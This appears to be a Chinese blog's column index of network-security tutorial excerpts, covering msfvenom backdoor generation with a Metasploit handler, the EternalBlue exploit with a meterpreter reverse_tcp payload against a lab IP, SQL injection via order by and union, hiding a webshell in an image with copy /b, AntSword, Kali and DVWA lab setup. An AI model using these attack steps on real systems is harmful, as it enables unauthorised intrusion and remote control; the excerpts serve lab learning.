网络安全
文章平均质量分 52
网络安全基本功与项目实战分享
程序那点事儿
当我是一个小白时照着抄都出错,当我不再是一个小白时,我想让小白照抄不出错!
展开
-
msfvenom 生成远控病毒
这里通过手动上传,先将kali上的demo.exe文件通过sz命令下载到本地电脑,然后复制该文件,再粘贴到win7上(192.168.43.128)。是用来生成后门软件的。在目标机上执行后门,在本地监听上线。use exploit/multi/handler 命令,使用该模块来开启后门程序的端口(9999)#-f : 文件格式(可执行文件)。#-lport: 攻击机(kali)的端口,填写范围在 0~65535。#-lhost: 攻击机(kali)的ip地址。#-o: 代表输出,后面跟生成后门的文件名称。原创 2024-09-20 10:31:18 · 443 阅读 · 0 评论 -
永恒之蓝漏洞
set payload windows/x64/meterpreter/reverse_tcp #设置payload(复制默认的)2017年暴露出来的漏洞,win10早期版本、win7、及之有的版本都存在这个漏洞。exploit 是漏洞攻击脚本(包含payload,为payload起到推动作用);set RHOSTS 192.168.43.128 #设置攻击目标的地址。payload 是攻击载荷(真正起作用的东西)原创 2024-09-20 10:34:03 · 337 阅读 · 0 评论 -
SQL注入漏洞
order by 后面跟数字表示按第几列来排序,如果数字超出最大列数,则会报错。2. 不管前面的sql语句是否成功执行,后面的sql都会执行。# 利用order by 漏洞判断select后的列数。# 利用union漏洞得到指定数据库下的所有表名。# 利用union漏洞得到该表所在的数据库名。1. union两边的sql列数要一样;# 利用union漏洞利用用户名+密码。原创 2024-09-20 10:35:25 · 282 阅读 · 0 评论 -
kali-linux-2023.4 安装与配置
作者:程序那点事儿 日期:2024/01/15 21:34。苹果电脑(本次安装的电脑)进入kali官网,点到下载页面原创 2024-09-21 15:35:48 · 369 阅读 · 0 评论 -
文件上传漏洞
文件包含,会把包含的任何文件当作PHP代码执行(一切都是php代码),因此我们看到的响应内容会是一些奇怪的内容(例如乱码)将木马写入到图片(copy命令将图片与文件合并):copy /b b.jpg+webshell.php bb.jpg。此时我们再用蚁剑去连接上传的那个文件,发现连接成功了。# /b : 表示二进制。原创 2024-09-20 10:37:20 · 282 阅读 · 0 评论 -
中国蚁剑(antSword)安装使用
进入 AntSword-Loader-v4.0.3-win32-x64 这个文件夹,然后双击AntSword.exe 这个文件 ,会弹出一个窗口(让我们选择antSword 的目录),点击初始化,这时候我们选择 antSword-2.1.15 这个文件夹就可以了。中国蚁剑(AntSword)是一款跨平台的开源网站管理工具,旨在满足渗透测试人员的需求。AntSword 支持多种操作系统,包括 Windows、Linux 和 macOS。作者:程序那点事儿 日期:2024/09/12 19:35。原创 2024-09-21 15:26:30 · 485 阅读 · 0 评论 -
DVWA 靶场环境搭建
进入DVWA/config目录下,将config.inc.php.dist文件名改为config.inc.php(去掉.dist),然后打开这个文件,修改db的用户名和密码。是OWSASP官方编写的PHP网站,包含了各种网站常见漏洞(漏洞靶场),可以学习攻击及修复方式。PHP环境包含了,Windows/Apache/Mysql/Php。作者:程序那点事儿 日期:2024/09/15 09:30。将DVWA源码解压放在phpstudy安装目录下。默认密码:password。默认用户名:admin。原创 2024-09-20 10:42:16 · 754 阅读 · 0 评论